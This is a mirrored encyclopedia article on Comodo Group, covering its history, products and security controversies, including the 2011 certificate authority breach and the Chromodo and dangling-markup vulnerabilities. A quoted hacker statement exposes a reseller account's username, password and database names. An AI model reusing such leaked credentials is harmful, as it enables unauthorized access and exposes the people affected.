Comodo Group

Last updated

Comodo Security Solutions, Inc.
Private
Industry Computer software
Founded United Kingdom
(1998;22 years ago (1998)) [1]
Founder Melih Abdulhayoğlu   OOjs UI icon edit-ltr-progressive.svg
Headquarters
Clifton, New Jersey
,
United States
Area served
Worldwide
Key people
 Melih Abdulhayoğlu (President and CEO)
Number of employees
1,200+[ citation needed ]
Website www.comodo.com

Comodo Security Solutions, Inc. is a cybersecurity company headquartered in Clifton, New Jersey in the United States.

Contents

History

The company was founded in 1998 in the United Kingdom [1] by Melih Abdulhayoğlu. The company relocated to the United States in 2004. Its products are focused on computer and internet security. The firm operates a Certificate Authority that issues SSL certificates, and offers information security products for both enterprises and consumers. [2] The company also helped on setting standards by contributing to the IETF (Internet Engineering Task Force) DNS Certification Authority Authorization (CAA) Resource Record. [3]

In October 2017, Francisco Partners acquired Comodo Certification Authority (Comodo CA) from Comodo Security Solutions, Inc. Francisco Partners rebranded Comodo CA in November 2018 to Sectigo. The change in name came less than a year after Comodo Certificate Authority (Comodo CA) was acquired by Francisco Partners. [4] [5]

On June 28, 2018, the new organization announced that it was expanding from TLS/SSL certificates into IoT security with the announcement of its IoT device security platform. [6] The company announced its new headquarters in Roseland, New Jersey on July 3, 2018 [7] and its acquisition of CodeGuard, a website maintenance and disaster recovery company, on August 16, 2018. [8]

Companies

Industry affiliations

Comodo is a member of the following industry organizations:

Products

Controversies

Symantec

In response to Symantec's comment asserting paid antivirus is superior to free antivirus, the CEO of Comodo Group challenged Symantec on 18 September 2010 to see whether paid or free products can better defend the consumer against malware. [20] GCN'S John Breeden understood Comodo's stance on free Antivirus software and challenging Symantec: "This is actually a pretty smart move based on previous reviews of AV performance we've done in the GCN Lab. Our most recent AV review this year showed no functional difference between free and paid programs in terms of stopping viruses, and it's been that way for many years. In fact you have to go all the way back to 2006 to find an AV roundup where viruses were missed by some companies." [21]

Symantec responded saying that if Comodo is interested they should have their product included in tests by independent reviewers. [22]

Comodo volunteered to a Symantec vs. Comodo independent review. [23] Though this showdown did not take place, Comodo has since been included in multiple independent reviews with AV-Test, [24] PC World, [25] Best Antivirus Reviews, [26] AV-Comparatives, [27] and PC Mag. [28]

Certificate hacking

On 23 March 2011, Comodo posted a report that 8 days earlier, on 15 March 2011, a user account with an affiliate registration authority had been compromised and was used to create a new user account that issued nine certificate signing requests. [29] Nine certificates for seven domains were issued. [29] The attack was traced to IP address 212.95.136.18, which originates in Tehran, Iran. [29] Though the firm initially reported that the breach was the result of a "state-driven attack", it subsequently stated that the origin of the attack may be the "result of an attacker attempting to lay a false trail.". [29] [30]

The attack was immediately thwarted, with Comodo revoking all of the bogus certificates. Comodo also stated that it was actively looking into ways to improve the security of its affiliates. [31]

In an update on 31 March 2011, Comodo stated that it detected and thwarted an intrusion into a reseller user account on 26 March 2011. The new controls implemented by Comodo following the incident on 15 March 2011, removed any risk of the fraudulent issue of certificates. Comodo believed the attack was from the same perpetrator as the incident on 15 March 2011. [32]

In regards to this second incident, Comodo stated, "Our CA infrastructure was not compromised. Our keys in our HSMs were not compromised. No certificates have been fraudulently issued. The attempt to fraudulently access the certificate ordering platform to issue a certificate failed." [33]

On 26 March 2011, a person under the username "ComodoHacker" verified that they were the attacker by posting the private keys online [34] and posted a series of messages detailing how poor Comodo's security is and bragging about his abilities: [35] [36]

I hacked Comodo from InstantSSL.it, their CEO's e-mail address mfpenco@mfpenco.com

Their Comodo username/password was: user: gtadmin password: globaltrust

Their DB name was: globaltrust and instantsslcms

Enough said, huh? Yes, enough said, someone who should know already knows...

Anyway, at first I should mention we have no relation to Iranian Cyber Army, we don't change DNSes, we

just hack and own.

I see Comodo CEO and other wrote that it was a managed attack, it was a planned attack, a group of

cyber criminals did it, etc.

Let me explain:

a) I'm not a group, I'm single hacker with experience of 1000 hacker, I'm single programmer with

experience of 1000 programmer, I'm single planner/project manager with experience of 1000 project

managers, so you are right, it's managed by 1000 hackers, but it was only I with experience of 1000

hackers.

Such issues have been widely reported, and have led to criticism of how certificates are issued and revoked. [37] [38] [39] [40] As of 2016, all of the certificates remain revoked. [29] Microsoft issued a security advisory and update to address the issue at the time of the event. [41] [42]

Such attacks are not unique to Comodo – the specifics will vary from CA to CA, RA to RA, but there are so many of these entities, all of them trusted by default, that further holes are deemed to be inevitable. [43]

Association with PrivDog

In February 2015, Comodo was associated with a man-in-the-middle enabling tool known as PrivDog, which claims to protect users against malicious advertising. [44]

PrivDog issued a statement on 23 February 2015, saying, "A minor intermittent defect has been detected in a third party library used by the PrivDog standalone application which potentially affects a very small number of users. This potential issue is only present in PrivDog versions, 3.0.96.0 and 3.0.97.0. The potential issue is not present in the PrivDog plug-in that is distributed with Comodo Browsers, and Comodo has not distributed this version to its users. there are potentially a maximum of 6,294 users in the USA and 57,568 users globally that this could potentially impact. The third party library used by PrivDog is not the same third party library used by Superfish....The potential issue has already been corrected. There will be an update tomorrow which will automatically update all 57,568 users of these specific PrivDog versions." [45]

Certificates issued to known malware

In 2009 Microsoft MVP Michael Burgess accused Comodo of issuing digital certificates to known malware. [46]

Comodo responded when notified and revoked the issued certificates that contained the rogue malware. [47]

Chromodo browser, ACL, no ASLR, VNC weak authentication

In January 2016, Tavis Ormandy reported that Comodo's Chromodo browser exhibited a number of vulnerabilities, including disabling of the same-origin policy. [48]

The vulnerability wasn't in the browser itself, which was based on the open-source code behind Google's Chrome browser. Rather, the issue was with an add-on. As soon as Comodo became aware of the issue in early February 2016, the company released a statement and a fix: "As an industry, software in general is always being updated, patched, fixed, addressed, improved – it goes hand in hand with any development cycle...What is critical in software development is how companies address an issue if a certain vulnerability is found – ensuring it never puts the customer at risk." Those using Chromodo immediately received an update. [49] The Chromodo browser was subsequently discontinued by Comodo.

Ormandy noted that Comodo received a "Excellence in Information Security Testing" award from Verizon despite the vulnerability in its browser, despite having its VNC delivered with a default of weak authentication, despite not enabling address space layout randomization (ASLR), and despite using access control lists (ACLs) throughout its product. Ormandy has the opinion that Verizon's certification methodology is at fault here. [50]

Let's Encrypt trademark registration application

In October 2015, Comodo applied for "Let's Encrypt", "Comodo Let's Encrypt", and "Let's Encrypt with Comodo" trademarks. [51] [52] [53] These trademark applications were filed almost a year after the Internet Security Research Group, parent organization of Let's Encrypt, started using the name Let's Encrypt publicly in November 2014, [54] and despite the fact Comodo's "intent to use" trademark filings acknowledge that it has never used "Let's Encrypt" as a brand.

On 24 June 2016, Comodo publicly posted in its forum that it had filed for "express abandonment" of their trademark applications. [55]

Comodo's Chief Technical Officer Robin Alden said, "Comodo has filed for express abandonment of the trademark applications at this time instead of waiting and allowing them to lapse. Following collaboration between Let's Encrypt and Comodo, the trademark issue is now resolved and behind us, and we'd like to thank the Let's Encrypt team for helping to bring it to a resolution." [56]

Dangling markup injection vulnerability

On 25 July 2016, Matthew Bryant showed that Comodo's website is vulnerable to dangling markup injection attacks and can send emails to system administrators from Comodo's servers to approve a wildcard certificate issue request which can be used to issue arbitrary wildcard certificates via Comodo's 30-Day PositiveSSL product. [57]

Bryant reached out in June 2016, and on 25 July 2016, Comodo's Chief Technical Officer Robin Alden confirmed a fix was put in place, within the responsible disclosure date per industry standards. [58]

See also

Related Research Articles

Hypertext Transfer Protocol Secure (HTTPS) is an extension of the Hypertext Transfer Protocol (HTTP). It is used for secure communication over a computer network, and is widely used on the Internet. In HTTPS, the communication protocol is encrypted using Transport Layer Security (TLS) or, formerly, its predecessor, Secure Sockets Layer (SSL). The protocol is therefore also referred to as HTTP over TLS, or HTTP over SSL.

Public key infrastructure System that can issue, distribute and verify digital certificates

A public key infrastructure (PKI) is a set of roles, policies, hardware, software and procedures needed to create, manage, distribute, use, store and revoke digital certificates and manage public-key encryption. The purpose of a PKI is to facilitate the secure electronic transfer of information for a range of network activities such as e-commerce, internet banking and confidential email. It is required for activities where simple passwords are an inadequate authentication method and more rigorous proof is required to confirm the identity of the parties involved in the communication and to validate the information being transferred.

Antivirus software Computer software to defend against malicious computer viruses

Antivirus software, or anti-virus software, also known as anti-malware, is a computer program used to prevent, detect, and remove malware.

In cryptography, a certificate authority or certification authority (CA) is an entity that issues digital certificates. A digital certificate certifies the ownership of a public key by the named subject of the certificate. This allows others to rely upon signatures or on assertions made about the private key that corresponds to the certified public key. A CA acts as a trusted third party—trusted both by the subject (owner) of the certificate and by the party relying upon the certificate. The format of these certificates is specified by the X.509 or EMV standard.

NortonLifeLock American technology company

NortonLifeLock Inc. is an American software company headquartered in Tempe, Arizona, United States. The company provides cybersecurity software and services. NortonLifeLock is a Fortune 500 company and a member of the S&P 500 stock-market index. The company also has development centers in Pune, Chennai and Bangalore.

Linux malware includes viruses, Trojans, worms and other types of malware that affect the Linux operating system. Linux, Unix and other Unix-like computer operating systems are generally regarded as very well-protected against, but not immune to, computer viruses.

Norton Internet Security, developed by Symantec Corporation, is a computer program that provides malware prevention and removal during a subscription period and uses signatures and heuristics to identify viruses. Other features included in the product are a personal firewall, email spam filtering, and phishing protection. With the release of the 2015 line in summer 2014, Symantec officially retired Norton Internet Security after 14 years as the chief Norton product. It is superseded by Norton Security, a rechristened adaptation of the Norton 360 security suite.

Melih Abdulhayoğlu American technologist and entrepreneur

Melih Abdulhayoğlu is a Turkish American entrepreneur and CEO of Comodo Group, an Internet security company he founded in the United Kingdom in 1998 and relocated to the US in 2004. In November 2017, he sold 50% of the Company's share to Francisco Partners, a private equity firm based on San Francisco.

VirusTotal cybersecurity website

Language

Man-in-the-browser, a form of Internet threat related to man-in-the-middle (MITM), is a proxy Trojan horse that infects a web browser by taking advantage of vulnerabilities in browser security to modify web pages, modify transaction content or insert additional transactions, all in a completely covert fashion invisible to both the user and host web application. A MitB attack will be successful irrespective of whether security mechanisms such as SSL/PKI and/or two or three-factor Authentication solutions are in place. A MitB attack may be countered by using out-of-band transaction verification, although SMS verification can be defeated by man-in-the-mobile (MitMo) malware infection on the mobile phone. Trojans may be detected and removed by antivirus software with a 23% success rate against Zeus in 2009, and still low rates in 2011. The 2011 report concluded that additional measures on top of antivirus were needed. A related, simpler attack is the boy-in-the-browser. The majority of financial service professionals in a survey considered MitB to be the greatest threat to online banking.

Form grabbing is a form of malware that works by retrieving authorization and log-in credentials from a web data form before it is passed over the Internet to a secure server. This allows the malware to avoid HTTPS encryption. This method is more effective than keylogger software because it will acquire the user’s credentials even if they are input using virtual keyboard, auto-fill, or copy and paste. It can then sort the information based on its variable names, such as email, account name, and password. Additionally, the form grabber will log the URL and title of the website the data was gathered from.

Comodo Internet Security

Comodo Internet Security (CIS) is developed and distributed by Comodo Group, a freemium Internet security suite that includes an antivirus program, personal firewall, sandbox, host-based intrusion prevention system (HIPS) and Website Filtering.

The Certification Authority Browser Forum, also known as CA/Browser Forum, is a voluntary consortium of certification authorities, vendors of Internet browser software, operating systems, and other PKI-enabled applications that promulgates industry guidelines governing the issuance and management of X.509 v.3 digital certificates that chain to a trust anchor embedded in such applications. Its guidelines cover certificates used for the SSL/TLS protocol and code signing, as well as system and network security of certificate authorities.

Comodo Dragon web browser based on the Chromium web browser

Comodo Dragon is a freeware web browser. It is based on Chromium and is produced by Comodo Group. Sporting a similar interface to Google Chrome, Dragon does not implement Chrome's user tracking and some other potentially privacy-compromising features, replacing them with its own user tracking implementations, and provides additional security measures, such as indicating the authenticity and relative strength of a website's Secure Sockets Layer (SSL) certificate.

DigiNotar was a Dutch certificate authority owned by VASCO Data Security International, Inc. On September 3, 2011, after it had become clear that a security breach had resulted in the fraudulent issuing of certificates, the Dutch government took over operational management of DigiNotar's systems. That same month, the company was declared bankrupt.

Certificate Authority Security Council organization

The Certificate Authority Security Council (CASC) is a multi-vendor industry advocacy group created to conduct research, promote Internet security standards and educate the public on Internet security issues.

DNS Certification Authority Authorization (CAA) is an Internet security policy mechanism which allows domain name holders to indicate to certificate authorities whether they are authorized to issue digital certificates for a particular domain name. It does this by means of a new "CAA" Domain Name System (DNS) resource record.

Automated Certificate Management Environment communications protocol for automating interactions between certificate authorities and users web servers, allowing cheap automated deployment of public key infrastructure; designed by the Internet Security Research Group for Lets Encrypt

The Automatic Certificate Management Environment (ACME) protocol is a communications protocol for automating interactions between certificate authorities and their users' web servers, allowing the automated deployment of public key infrastructure at very low cost. It was designed by the Internet Security Research Group (ISRG) for their Let's Encrypt service.

Trustico is a dedicated SSL Certificate Provider, whose headquarters are in the United Kingdom.

References

  1. 1 2 "How US entrepreneur's global internet security firm started life in Bradford". Telegraph & Argus. 3 September 2014. Retrieved 3 September 2014.
  2. "Comodo Company Overview" . Retrieved 14 August 2015.
  3. "DNS Certification Authority Authorization – Comodo" . Retrieved 14 January 2013.
  4. "Comodo Sells Certificate Business to Private Equity Firm | SecurityWeek.Com". www.securityweek.com. Retrieved 29 October 2019.
  5. Murphy, Ian (2 November 2018). "Comodo CA becomes Sectigo and expands to cover IoT -". Enterprise Times. Retrieved 21 November 2019.
  6. "Comodo CA launches IoT security platform". BetaNews. 28 June 2018. Retrieved 29 October 2019.
  7. Perry, Jessica (3 July 2018). "Comodo CA global HQ coming to Roseland". NJBIZ. Retrieved 29 October 2019.
  8. Novinson, Michael (16 August 2018). "Comodo CA Buys Website Disaster Recovery Startup CodeGuard". CRN. Retrieved 29 October 2019.
  9. "Comodo – Contact Us".
  10. Nohe, Patrick (1 November 2018). "Comodo CA changes its name to Sectigo".
  11. "Comodo CA Rebrands as Sectigo". 1 November 2018.
  12. "Comodo Security Solutions, Inc". Icsalabs.com. Retrieved 30 March 2015.
  13. Joe Callan. "Domainers Magazine – DNS.com : The Next Geo-Targeting Solution – Jul–Aug (Issue 22)". Domainersmagazine.com. Archived from the original on 12 April 2015. Retrieved 30 March 2015.
  14. Ellen Messmer (14 February 2013). "Multivendor power council formed to address digital certificate issues". Network World. Archived from the original on 28 July 2013.
  15. "Authentication Security News, Analysis, Discussion, & Community". Darkreading.com. Archived from the original on 10 April 2013. Retrieved 30 March 2015.
  16. "SecurityPark". Archived from the original on 2 April 2015. Retrieved 30 March 2015.
  17. "CA/Browser Forum". Cabforum.org. Retrieved 23 April 2013.
  18. Wilson, Wilson. "CA/Browser Forum History" (PDF). DigiCert. Retrieved 23 April 2013.
  19. "Industry Round Table May 17th 2005 – New York" (PDF). Retrieved 17 May 2005.
  20. Abdulhayoğlu, Melih (18 September 2010). "Challenge to Symantec from Comodo CEO". Comodo Group. Retrieved 22 September 2010.
  21. John Breeden II. "Is free virus protection inferior?". gcn.com. Retrieved 23 December 2016.
  22. Rubenking, Neil J. (22 September 2010). "Comodo Challenges Symantec to Antivirus Showdown". PC Magazine . Ziff Davis, Inc. Retrieved 22 September 2010.
  23. "Challenge to Symantec from Comodo CEO!" . Retrieved 23 December 2016.
  24. Ms. Smith. "AV-test Lab tests 16 Linux antivirus products against Windows and Linux malware". www.networkworld.com. Retrieved 23 December 2016.
  25. Erik Larkin (24 August 2009). "Comodo Internet Security Free Antivirus Software". www.pcworld.com. Retrieved 23 December 2016.
  26. Daniele P. "Comodo 2016 Review: Malware Protection & Online Security". www.bestantivirus.com. Retrieved 23 December 2016.
  27. "Independent Tests of Anti-Virus Software". www.av-comparatives.org. Retrieved 23 December 2016.
  28. Neil P. Rubenking. "The Best Free Antivirus Protection of 2016". www.pcmag.com. Retrieved 23 December 2016.
  29. 1 2 3 4 5 "Report of incident on 15-MAR-2011: Update 31-MAR-2011". Comodo group. Retrieved 24 March 2011.
  30. Hallam-Baker, Phillip (23 March 2011). "The Recent RA Compromise". Comodo Blog. Retrieved 24 March 2011.
  31. "Iran accused in 'dire' net security attack". BBC News. 24 March 2011. Retrieved 23 December 2016.
  32. "Update 31-MAR-2011" . Retrieved 23 December 2016.
  33. "Update 31-Mar-2011" . Retrieved 23 December 2016.
  34. "Verifying the Comodo Hacker's key".
  35. Bright, Peter (28 March 2011). "Independent Iranian Hacker Claims Responsibility for Comodo Hack" (WIRED). Wired. Retrieved 29 March 2011.
  36. "ComodoHacker's Pastebin". Pastebin.com. 5 March 2011. Retrieved 30 March 2015.
  37. Eckersley, Peter (23 March 2011). "Iranian hackers obtain fraudulent HTTPS certificates: How close to a Web security meltdown did we get?". EFF. Retrieved 24 March 2011.
  38. "Iran accused in 'dire' net security attack" (BBC). BBC News. 24 March 2011. Retrieved 24 March 2011.
  39. "Detecting Certificate Authority compromises and web browser collusion". TOR. 22 March 2011. Retrieved 24 March 2011.
  40. Elinor Mills and Declan McCullagh (23 March 2011). "Google, Yahoo, Skype targeted in attack linked to Iran". CNET. Retrieved 24 March 2011.
  41. "Microsoft Security Advisory (2524375)" (Microsoft). 23 March 2011. Retrieved 24 March 2011.
  42. "Microsoft Security Advisory: Fraudulent Digital Certificates could allow spoofing". Microsoft. 23 March 2011. Retrieved 24 March 2011.
  43. "Independent Iranian Hacker Claims Responsibility for Comodo Hack" . Retrieved 23 December 2016.
  44. http://www.pcworld.com/article/2887632/secure-advertising-tool-privdog-compromises-https-security.html |title=PrivDog Security Advisory (Threat level: LOW) |accessdate=30 December 2016
  45. "PrivDog Security Advisory (Threat level: LOW)" . Retrieved 23 December 2016.[ permanent dead link ]
  46. "Comodo continue to to[sic] issue certificates to known Malware - May 2009 - Forums".
  47. "Microsoft MVP Mike Burgess Responds To Comodo's CEO On Comodo Certificates Issued To Malware Distributors" . Retrieved 23 December 2016.
  48. https://code.google.com/p/google-security-research/issues/detail?id=704 |title=Comodo "Chromodo" Browser disables same origin policy, Effectively turning off web security
  49. "Comodo will fix major flaw in knock-off Chrome browser". 4 February 2016. Retrieved 23 December 2016.
  50. Why Antivirus Standards of Certification Need to Change, tripwire, 23 March 2016.
  51. "Trademark Status & Document Retrieval". tsdr.uspto.gov. Retrieved 23 June 2016.
  52. "Trademark Status & Document Retrieval". tsdr.uspto.gov. Retrieved 23 June 2016.
  53. "Trademark Status & Document Retrieval". tsdr.uspto.gov. Retrieved 23 June 2016.
  54. Tsidulko, Joseph (19 November 2014). "Let's Encrypt, A Free And Automated Certificate Authority, Comes Out Of Stealth Mode". CRN. Retrieved 23 June 2016.
  55. "Topic: Trademark registration" . Retrieved 24 June 2016.
  56. "Comodo Stands Down From Trademark Tussle with Let's Encrypt". 27 June 2016. Retrieved 23 December 2016.
  57. "Keeping Positive – Obtaining Arbitrary Wildcard SSL Certificates from Comodo via Dangling Markup Injection". thehackerblog.com. Retrieved 29 July 2016.
  58. "Keeping Positive – Obtaining Arbitrary Wildcard SSL Certificates from Comodo via Dangling Markup Injection" . Retrieved 23 December 2016.
This page is based on this Wikipedia article
Text is available under the CC BY-SA 4.0 license; additional terms may apply.
Images, videos and audio are available under their respective licenses.